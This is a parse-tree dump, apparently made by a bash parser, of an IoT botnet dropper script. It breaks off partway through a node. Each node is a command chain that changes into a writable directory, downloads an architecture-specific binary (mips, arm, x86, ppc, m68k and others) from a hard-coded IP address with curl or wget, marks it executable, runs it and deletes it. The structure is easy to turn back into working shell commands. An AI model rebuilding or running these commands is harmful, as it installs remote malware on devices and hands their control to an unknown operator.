ListNode(lineno=2, pos=(12, 312), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 129), parts=[
    WordNode(lineno=2, pos=(67, 71), word='curl'),
    WordNode(lineno=2, pos=(72, 74), word='-O'),
    WordNode(lineno=2, pos=(75, 129), word='http://185.148.39.193/lkjghsdfkljgfhmipslksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(130, 132)),
  CommandNode(lineno=2, pos=(133, 192), parts=[
    WordNode(lineno=2, pos=(133, 137), word='wget'),
    WordNode(lineno=2, pos=(138, 192), word='http://185.148.39.193/lkjghsdfkljgfhmipslksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(192, 193)),
  CommandNode(lineno=2, pos=(194, 235), parts=[
    WordNode(lineno=2, pos=(194, 199), word='chmod'),
    WordNode(lineno=2, pos=(200, 202), word='+x'),
    WordNode(lineno=2, pos=(203, 235), word='lkjghsdfkljgfhmipslksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(235, 236)),
  CommandNode(lineno=2, pos=(237, 271), parts=[
    WordNode(lineno=2, pos=(237, 271), word='./lkjghsdfkljgfhmipslksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(271, 272)),
  CommandNode(lineno=2, pos=(273, 312), parts=[
    WordNode(lineno=2, pos=(273, 275), word='rm'),
    WordNode(lineno=2, pos=(276, 279), word='-rf'),
    WordNode(lineno=2, pos=(280, 312), word='lkjghsdfkljgfhmipslksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=3, pos=(313, 613), parts=[
  CommandNode(lineno=3, pos=(313, 320), parts=[
    WordNode(lineno=3, pos=(313, 315), word='cd'),
    WordNode(lineno=3, pos=(316, 320), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(321, 323)),
  CommandNode(lineno=3, pos=(324, 335), parts=[
    WordNode(lineno=3, pos=(324, 326), word='cd'),
    WordNode(lineno=3, pos=(327, 335), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(336, 338)),
  CommandNode(lineno=3, pos=(339, 346), parts=[
    WordNode(lineno=3, pos=(339, 341), word='cd'),
    WordNode(lineno=3, pos=(342, 346), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(347, 349)),
  CommandNode(lineno=3, pos=(350, 358), parts=[
    WordNode(lineno=3, pos=(350, 352), word='cd'),
    WordNode(lineno=3, pos=(353, 358), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(359, 361)),
  CommandNode(lineno=3, pos=(362, 366), parts=[
    WordNode(lineno=3, pos=(362, 364), word='cd'),
    WordNode(lineno=3, pos=(365, 366), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(366, 367)),
  CommandNode(lineno=3, pos=(368, 430), parts=[
    WordNode(lineno=3, pos=(368, 372), word='curl'),
    WordNode(lineno=3, pos=(373, 375), word='-O'),
    WordNode(lineno=3, pos=(376, 430), word='http://185.148.39.193/lkjghsdfkljgfhmpsllksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(431, 433)),
  CommandNode(lineno=3, pos=(434, 493), parts=[
    WordNode(lineno=3, pos=(434, 438), word='wget'),
    WordNode(lineno=3, pos=(439, 493), word='http://185.148.39.193/lkjghsdfkljgfhmpsllksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(493, 494)),
  CommandNode(lineno=3, pos=(495, 536), parts=[
    WordNode(lineno=3, pos=(495, 500), word='chmod'),
    WordNode(lineno=3, pos=(501, 503), word='+x'),
    WordNode(lineno=3, pos=(504, 536), word='lkjghsdfkljgfhmpsllksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(536, 537)),
  CommandNode(lineno=3, pos=(538, 572), parts=[
    WordNode(lineno=3, pos=(538, 572), word='./lkjghsdfkljgfhmpsllksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(572, 573)),
  CommandNode(lineno=3, pos=(574, 613), parts=[
    WordNode(lineno=3, pos=(574, 576), word='rm'),
    WordNode(lineno=3, pos=(577, 580), word='-rf'),
    WordNode(lineno=3, pos=(581, 613), word='lkjghsdfkljgfhmpsllksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=4, pos=(614, 909), parts=[
  CommandNode(lineno=4, pos=(614, 621), parts=[
    WordNode(lineno=4, pos=(614, 616), word='cd'),
    WordNode(lineno=4, pos=(617, 621), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(622, 624)),
  CommandNode(lineno=4, pos=(625, 636), parts=[
    WordNode(lineno=4, pos=(625, 627), word='cd'),
    WordNode(lineno=4, pos=(628, 636), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(637, 639)),
  CommandNode(lineno=4, pos=(640, 647), parts=[
    WordNode(lineno=4, pos=(640, 642), word='cd'),
    WordNode(lineno=4, pos=(643, 647), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(648, 650)),
  CommandNode(lineno=4, pos=(651, 659), parts=[
    WordNode(lineno=4, pos=(651, 653), word='cd'),
    WordNode(lineno=4, pos=(654, 659), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(660, 662)),
  CommandNode(lineno=4, pos=(663, 667), parts=[
    WordNode(lineno=4, pos=(663, 665), word='cd'),
    WordNode(lineno=4, pos=(666, 667), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(667, 668)),
  CommandNode(lineno=4, pos=(669, 730), parts=[
    WordNode(lineno=4, pos=(669, 673), word='curl'),
    WordNode(lineno=4, pos=(674, 676), word='-O'),
    WordNode(lineno=4, pos=(677, 730), word='http://185.148.39.193/lkjghsdfkljgfhsh4lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(731, 733)),
  CommandNode(lineno=4, pos=(734, 792), parts=[
    WordNode(lineno=4, pos=(734, 738), word='wget'),
    WordNode(lineno=4, pos=(739, 792), word='http://185.148.39.193/lkjghsdfkljgfhsh4lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(792, 793)),
  CommandNode(lineno=4, pos=(794, 834), parts=[
    WordNode(lineno=4, pos=(794, 799), word='chmod'),
    WordNode(lineno=4, pos=(800, 802), word='+x'),
    WordNode(lineno=4, pos=(803, 834), word='lkjghsdfkljgfhsh4lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(834, 835)),
  CommandNode(lineno=4, pos=(836, 869), parts=[
    WordNode(lineno=4, pos=(836, 869), word='./lkjghsdfkljgfhsh4lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(869, 870)),
  CommandNode(lineno=4, pos=(871, 909), parts=[
    WordNode(lineno=4, pos=(871, 873), word='rm'),
    WordNode(lineno=4, pos=(874, 877), word='-rf'),
    WordNode(lineno=4, pos=(878, 909), word='lkjghsdfkljgfhsh4lksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=5, pos=(910, 1205), parts=[
  CommandNode(lineno=5, pos=(910, 917), parts=[
    WordNode(lineno=5, pos=(910, 912), word='cd'),
    WordNode(lineno=5, pos=(913, 917), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(918, 920)),
  CommandNode(lineno=5, pos=(921, 932), parts=[
    WordNode(lineno=5, pos=(921, 923), word='cd'),
    WordNode(lineno=5, pos=(924, 932), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(933, 935)),
  CommandNode(lineno=5, pos=(936, 943), parts=[
    WordNode(lineno=5, pos=(936, 938), word='cd'),
    WordNode(lineno=5, pos=(939, 943), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(944, 946)),
  CommandNode(lineno=5, pos=(947, 955), parts=[
    WordNode(lineno=5, pos=(947, 949), word='cd'),
    WordNode(lineno=5, pos=(950, 955), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(956, 958)),
  CommandNode(lineno=5, pos=(959, 963), parts=[
    WordNode(lineno=5, pos=(959, 961), word='cd'),
    WordNode(lineno=5, pos=(962, 963), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(963, 964)),
  CommandNode(lineno=5, pos=(965, 1026), parts=[
    WordNode(lineno=5, pos=(965, 969), word='curl'),
    WordNode(lineno=5, pos=(970, 972), word='-O'),
    WordNode(lineno=5, pos=(973, 1026), word='http://185.148.39.193/lkjghsdfkljgfhx86lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(1027, 1029)),
  CommandNode(lineno=5, pos=(1030, 1088), parts=[
    WordNode(lineno=5, pos=(1030, 1034), word='wget'),
    WordNode(lineno=5, pos=(1035, 1088), word='http://185.148.39.193/lkjghsdfkljgfhx86lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1088, 1089)),
  CommandNode(lineno=5, pos=(1090, 1130), parts=[
    WordNode(lineno=5, pos=(1090, 1095), word='chmod'),
    WordNode(lineno=5, pos=(1096, 1098), word='+x'),
    WordNode(lineno=5, pos=(1099, 1130), word='lkjghsdfkljgfhx86lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1130, 1131)),
  CommandNode(lineno=5, pos=(1132, 1165), parts=[
    WordNode(lineno=5, pos=(1132, 1165), word='./lkjghsdfkljgfhx86lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1165, 1166)),
  CommandNode(lineno=5, pos=(1167, 1205), parts=[
    WordNode(lineno=5, pos=(1167, 1169), word='rm'),
    WordNode(lineno=5, pos=(1170, 1173), word='-rf'),
    WordNode(lineno=5, pos=(1174, 1205), word='lkjghsdfkljgfhx86lksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=6, pos=(1206, 1501), parts=[
  CommandNode(lineno=6, pos=(1206, 1213), parts=[
    WordNode(lineno=6, pos=(1206, 1208), word='cd'),
    WordNode(lineno=6, pos=(1209, 1213), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1214, 1216)),
  CommandNode(lineno=6, pos=(1217, 1228), parts=[
    WordNode(lineno=6, pos=(1217, 1219), word='cd'),
    WordNode(lineno=6, pos=(1220, 1228), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1229, 1231)),
  CommandNode(lineno=6, pos=(1232, 1239), parts=[
    WordNode(lineno=6, pos=(1232, 1234), word='cd'),
    WordNode(lineno=6, pos=(1235, 1239), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1240, 1242)),
  CommandNode(lineno=6, pos=(1243, 1251), parts=[
    WordNode(lineno=6, pos=(1243, 1245), word='cd'),
    WordNode(lineno=6, pos=(1246, 1251), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1252, 1254)),
  CommandNode(lineno=6, pos=(1255, 1259), parts=[
    WordNode(lineno=6, pos=(1255, 1257), word='cd'),
    WordNode(lineno=6, pos=(1258, 1259), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1259, 1260)),
  CommandNode(lineno=6, pos=(1261, 1322), parts=[
    WordNode(lineno=6, pos=(1261, 1265), word='curl'),
    WordNode(lineno=6, pos=(1266, 1268), word='-O'),
    WordNode(lineno=6, pos=(1269, 1322), word='http://185.148.39.193/lkjghsdfkljgfharmlksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1323, 1325)),
  CommandNode(lineno=6, pos=(1326, 1384), parts=[
    WordNode(lineno=6, pos=(1326, 1330), word='wget'),
    WordNode(lineno=6, pos=(1331, 1384), word='http://185.148.39.193/lkjghsdfkljgfharmlksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1384, 1385)),
  CommandNode(lineno=6, pos=(1386, 1426), parts=[
    WordNode(lineno=6, pos=(1386, 1391), word='chmod'),
    WordNode(lineno=6, pos=(1392, 1394), word='+x'),
    WordNode(lineno=6, pos=(1395, 1426), word='lkjghsdfkljgfharmlksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1426, 1427)),
  CommandNode(lineno=6, pos=(1428, 1461), parts=[
    WordNode(lineno=6, pos=(1428, 1461), word='./lkjghsdfkljgfharmlksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1461, 1462)),
  CommandNode(lineno=6, pos=(1463, 1501), parts=[
    WordNode(lineno=6, pos=(1463, 1465), word='rm'),
    WordNode(lineno=6, pos=(1466, 1469), word='-rf'),
    WordNode(lineno=6, pos=(1470, 1501), word='lkjghsdfkljgfharmlksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=7, pos=(1502, 1802), parts=[
  CommandNode(lineno=7, pos=(1502, 1509), parts=[
    WordNode(lineno=7, pos=(1502, 1504), word='cd'),
    WordNode(lineno=7, pos=(1505, 1509), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1510, 1512)),
  CommandNode(lineno=7, pos=(1513, 1524), parts=[
    WordNode(lineno=7, pos=(1513, 1515), word='cd'),
    WordNode(lineno=7, pos=(1516, 1524), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1525, 1527)),
  CommandNode(lineno=7, pos=(1528, 1535), parts=[
    WordNode(lineno=7, pos=(1528, 1530), word='cd'),
    WordNode(lineno=7, pos=(1531, 1535), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1536, 1538)),
  CommandNode(lineno=7, pos=(1539, 1547), parts=[
    WordNode(lineno=7, pos=(1539, 1541), word='cd'),
    WordNode(lineno=7, pos=(1542, 1547), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1548, 1550)),
  CommandNode(lineno=7, pos=(1551, 1555), parts=[
    WordNode(lineno=7, pos=(1551, 1553), word='cd'),
    WordNode(lineno=7, pos=(1554, 1555), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1555, 1556)),
  CommandNode(lineno=7, pos=(1557, 1619), parts=[
    WordNode(lineno=7, pos=(1557, 1561), word='curl'),
    WordNode(lineno=7, pos=(1562, 1564), word='-O'),
    WordNode(lineno=7, pos=(1565, 1619), word='http://185.148.39.193/lkjghsdfkljgfharm7lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1620, 1622)),
  CommandNode(lineno=7, pos=(1623, 1682), parts=[
    WordNode(lineno=7, pos=(1623, 1627), word='wget'),
    WordNode(lineno=7, pos=(1628, 1682), word='http://185.148.39.193/lkjghsdfkljgfharm7lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1682, 1683)),
  CommandNode(lineno=7, pos=(1684, 1725), parts=[
    WordNode(lineno=7, pos=(1684, 1689), word='chmod'),
    WordNode(lineno=7, pos=(1690, 1692), word='+x'),
    WordNode(lineno=7, pos=(1693, 1725), word='lkjghsdfkljgfharm7lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1725, 1726)),
  CommandNode(lineno=7, pos=(1727, 1761), parts=[
    WordNode(lineno=7, pos=(1727, 1761), word='./lkjghsdfkljgfharm7lksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1761, 1762)),
  CommandNode(lineno=7, pos=(1763, 1802), parts=[
    WordNode(lineno=7, pos=(1763, 1765), word='rm'),
    WordNode(lineno=7, pos=(1766, 1769), word='-rf'),
    WordNode(lineno=7, pos=(1770, 1802), word='lkjghsdfkljgfharm7lksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=8, pos=(1803, 2023), parts=[
  CommandNode(lineno=8, pos=(1803, 1810), parts=[
    WordNode(lineno=8, pos=(1803, 1805), word='cd'),
    WordNode(lineno=8, pos=(1806, 1810), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1811, 1813)),
  CommandNode(lineno=8, pos=(1814, 1825), parts=[
    WordNode(lineno=8, pos=(1814, 1816), word='cd'),
    WordNode(lineno=8, pos=(1817, 1825), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1826, 1828)),
  CommandNode(lineno=8, pos=(1829, 1836), parts=[
    WordNode(lineno=8, pos=(1829, 1831), word='cd'),
    WordNode(lineno=8, pos=(1832, 1836), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1837, 1839)),
  CommandNode(lineno=8, pos=(1840, 1848), parts=[
    WordNode(lineno=8, pos=(1840, 1842), word='cd'),
    WordNode(lineno=8, pos=(1843, 1848), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1849, 1851)),
  CommandNode(lineno=8, pos=(1852, 1856), parts=[
    WordNode(lineno=8, pos=(1852, 1854), word='cd'),
    WordNode(lineno=8, pos=(1855, 1856), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1856, 1857)),
  CommandNode(lineno=8, pos=(1858, 1904), parts=[
    WordNode(lineno=8, pos=(1858, 1862), word='curl'),
    WordNode(lineno=8, pos=(1863, 1865), word='-O'),
    WordNode(lineno=8, pos=(1866, 1904), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1905, 1907)),
  CommandNode(lineno=8, pos=(1908, 1951), parts=[
    WordNode(lineno=8, pos=(1908, 1912), word='wget'),
    WordNode(lineno=8, pos=(1913, 1951), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1951, 1952)),
  CommandNode(lineno=8, pos=(1953, 1978), parts=[
    WordNode(lineno=8, pos=(1953, 1958), word='chmod'),
    WordNode(lineno=8, pos=(1959, 1961), word='+x'),
    WordNode(lineno=8, pos=(1962, 1978), word='DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1978, 1979)),
  CommandNode(lineno=8, pos=(1980, 1998), parts=[
    WordNode(lineno=8, pos=(1980, 1998), word='./DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1998, 1999)),
  CommandNode(lineno=8, pos=(2000, 2023), parts=[
    WordNode(lineno=8, pos=(2000, 2002), word='rm'),
    WordNode(lineno=8, pos=(2003, 2006), word='-rf'),
    WordNode(lineno=8, pos=(2007, 2023), word='DOESNTEXISTLELEL'),
  ]),
])
ListNode(lineno=9, pos=(2024, 2244), parts=[
  CommandNode(lineno=9, pos=(2024, 2031), parts=[
    WordNode(lineno=9, pos=(2024, 2026), word='cd'),
    WordNode(lineno=9, pos=(2027, 2031), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2032, 2034)),
  CommandNode(lineno=9, pos=(2035, 2046), parts=[
    WordNode(lineno=9, pos=(2035, 2037), word='cd'),
    WordNode(lineno=9, pos=(2038, 2046), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2047, 2049)),
  CommandNode(lineno=9, pos=(2050, 2057), parts=[
    WordNode(lineno=9, pos=(2050, 2052), word='cd'),
    WordNode(lineno=9, pos=(2053, 2057), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2058, 2060)),
  CommandNode(lineno=9, pos=(2061, 2069), parts=[
    WordNode(lineno=9, pos=(2061, 2063), word='cd'),
    WordNode(lineno=9, pos=(2064, 2069), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2070, 2072)),
  CommandNode(lineno=9, pos=(2073, 2077), parts=[
    WordNode(lineno=9, pos=(2073, 2075), word='cd'),
    WordNode(lineno=9, pos=(2076, 2077), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2077, 2078)),
  CommandNode(lineno=9, pos=(2079, 2125), parts=[
    WordNode(lineno=9, pos=(2079, 2083), word='curl'),
    WordNode(lineno=9, pos=(2084, 2086), word='-O'),
    WordNode(lineno=9, pos=(2087, 2125), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2126, 2128)),
  CommandNode(lineno=9, pos=(2129, 2172), parts=[
    WordNode(lineno=9, pos=(2129, 2133), word='wget'),
    WordNode(lineno=9, pos=(2134, 2172), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2172, 2173)),
  CommandNode(lineno=9, pos=(2174, 2199), parts=[
    WordNode(lineno=9, pos=(2174, 2179), word='chmod'),
    WordNode(lineno=9, pos=(2180, 2182), word='+x'),
    WordNode(lineno=9, pos=(2183, 2199), word='DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2199, 2200)),
  CommandNode(lineno=9, pos=(2201, 2219), parts=[
    WordNode(lineno=9, pos=(2201, 2219), word='./DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2219, 2220)),
  CommandNode(lineno=9, pos=(2221, 2244), parts=[
    WordNode(lineno=9, pos=(2221, 2223), word='rm'),
    WordNode(lineno=9, pos=(2224, 2227), word='-rf'),
    WordNode(lineno=9, pos=(2228, 2244), word='DOESNTEXISTLELEL'),
  ]),
])
ListNode(lineno=10, pos=(2245, 2540), parts=[
  CommandNode(lineno=10, pos=(2245, 2252), parts=[
    WordNode(lineno=10, pos=(2245, 2247), word='cd'),
    WordNode(lineno=10, pos=(2248, 2252), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2253, 2255)),
  CommandNode(lineno=10, pos=(2256, 2267), parts=[
    WordNode(lineno=10, pos=(2256, 2258), word='cd'),
    WordNode(lineno=10, pos=(2259, 2267), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2268, 2270)),
  CommandNode(lineno=10, pos=(2271, 2278), parts=[
    WordNode(lineno=10, pos=(2271, 2273), word='cd'),
    WordNode(lineno=10, pos=(2274, 2278), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2279, 2281)),
  CommandNode(lineno=10, pos=(2282, 2290), parts=[
    WordNode(lineno=10, pos=(2282, 2284), word='cd'),
    WordNode(lineno=10, pos=(2285, 2290), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2291, 2293)),
  CommandNode(lineno=10, pos=(2294, 2298), parts=[
    WordNode(lineno=10, pos=(2294, 2296), word='cd'),
    WordNode(lineno=10, pos=(2297, 2298), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2298, 2299)),
  CommandNode(lineno=10, pos=(2300, 2361), parts=[
    WordNode(lineno=10, pos=(2300, 2304), word='curl'),
    WordNode(lineno=10, pos=(2305, 2307), word='-O'),
    WordNode(lineno=10, pos=(2308, 2361), word='http://185.148.39.193/lkjghsdfkljgfhppclksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2362, 2364)),
  CommandNode(lineno=10, pos=(2365, 2423), parts=[
    WordNode(lineno=10, pos=(2365, 2369), word='wget'),
    WordNode(lineno=10, pos=(2370, 2423), word='http://185.148.39.193/lkjghsdfkljgfhppclksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2423, 2424)),
  CommandNode(lineno=10, pos=(2425, 2465), parts=[
    WordNode(lineno=10, pos=(2425, 2430), word='chmod'),
    WordNode(lineno=10, pos=(2431, 2433), word='+x'),
    WordNode(lineno=10, pos=(2434, 2465), word='lkjghsdfkljgfhppclksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2465, 2466)),
  CommandNode(lineno=10, pos=(2467, 2500), parts=[
    WordNode(lineno=10, pos=(2467, 2500), word='./lkjghsdfkljgfhppclksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2500, 2501)),
  CommandNode(lineno=10, pos=(2502, 2540), parts=[
    WordNode(lineno=10, pos=(2502, 2504), word='rm'),
    WordNode(lineno=10, pos=(2505, 2508), word='-rf'),
    WordNode(lineno=10, pos=(2509, 2540), word='lkjghsdfkljgfhppclksdhjfklsjdhf'),
  ]),
])
ListNode(lineno=11, pos=(2541, 2761), parts=[
  CommandNode(lineno=11, pos=(2541, 2548), parts=[
    WordNode(lineno=11, pos=(2541, 2543), word='cd'),
    WordNode(lineno=11, pos=(2544, 2548), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2549, 2551)),
  CommandNode(lineno=11, pos=(2552, 2563), parts=[
    WordNode(lineno=11, pos=(2552, 2554), word='cd'),
    WordNode(lineno=11, pos=(2555, 2563), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2564, 2566)),
  CommandNode(lineno=11, pos=(2567, 2574), parts=[
    WordNode(lineno=11, pos=(2567, 2569), word='cd'),
    WordNode(lineno=11, pos=(2570, 2574), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2575, 2577)),
  CommandNode(lineno=11, pos=(2578, 2586), parts=[
    WordNode(lineno=11, pos=(2578, 2580), word='cd'),
    WordNode(lineno=11, pos=(2581, 2586), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2587, 2589)),
  CommandNode(lineno=11, pos=(2590, 2594), parts=[
    WordNode(lineno=11, pos=(2590, 2592), word='cd'),
    WordNode(lineno=11, pos=(2593, 2594), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2594, 2595)),
  CommandNode(lineno=11, pos=(2596, 2642), parts=[
    WordNode(lineno=11, pos=(2596, 2600), word='curl'),
    WordNode(lineno=11, pos=(2601, 2603), word='-O'),
    WordNode(lineno=11, pos=(2604, 2642), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2643, 2645)),
  CommandNode(lineno=11, pos=(2646, 2689), parts=[
    WordNode(lineno=11, pos=(2646, 2650), word='wget'),
    WordNode(lineno=11, pos=(2651, 2689), word='http://185.148.39.193/DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2689, 2690)),
  CommandNode(lineno=11, pos=(2691, 2716), parts=[
    WordNode(lineno=11, pos=(2691, 2696), word='chmod'),
    WordNode(lineno=11, pos=(2697, 2699), word='+x'),
    WordNode(lineno=11, pos=(2700, 2716), word='DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2716, 2717)),
  CommandNode(lineno=11, pos=(2718, 2736), parts=[
    WordNode(lineno=11, pos=(2718, 2736), word='./DOESNTEXISTLELEL'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2736, 2737)),
  CommandNode(lineno=11, pos=(2738, 2761), parts=[
    WordNode(lineno=11, pos=(2738, 2740), word='rm'),
    WordNode(lineno=11, pos=(2741, 2744), word='-rf'),
    WordNode(lineno=11, pos=(2745, 2761), word='DOESNTEXISTLELEL'),
  ]),
])
ListNode(lineno=12, pos=(2762, 3062), parts=[
  CommandNode(lineno=12, pos=(2762, 2769), parts=[
    WordNode(lineno=12, pos=(2762, 2764), word='cd'),
    WordNode(lineno=12, pos=(2765, 2769), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(2770, 2772)),
  CommandNode(lineno=12, pos=(2773, 2784), parts=[
    WordNode(lineno=12, pos=(2773, 2775), word='cd'),
    WordNode(lineno=12, pos=(2776, 2784), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(2785, 2787)),
  CommandNode(lineno=12, pos=(2788, 2795), parts=[
    WordNode(lineno=12, pos=(2788, 2790), word='cd'),
    WordNode(lineno=12, pos=(2791, 2795), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(2796, 2798)),
  CommandNode(lineno=12, pos=(2799, 2807), parts=[
    WordNode(lineno=12, pos=(2799, 2801), word='cd'),
    WordNode(lineno=12, pos=(2802, 2807), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(2808, 2810)),
  CommandNode(lineno=12, pos=(2811, 2815), parts=[
    WordNode(lineno=12, pos=(2811, 2813), word='cd'),
    WordNode(lineno=12, pos=(2814, 2815), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2815, 2816)),
  CommandNode(lineno=12, pos=(2817, 2879), parts=[
    WordNode(lineno=12, pos=(2817, 2821), word='curl'),
    WordNode(lineno=12, pos=(2822, 2824), word='-O'),
    WordNode(lineno=12, pos=(2825, 2879), word='http://185.148.39.193/lkjghsdfkljgfhm68klksdhjfklsjdhf'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(2880, 2882)),
  CommandNode(lineno=12, pos=(2883, 2942), parts=[
    WordNode(lineno=12, pos=(2883, 2887), word='wget'),
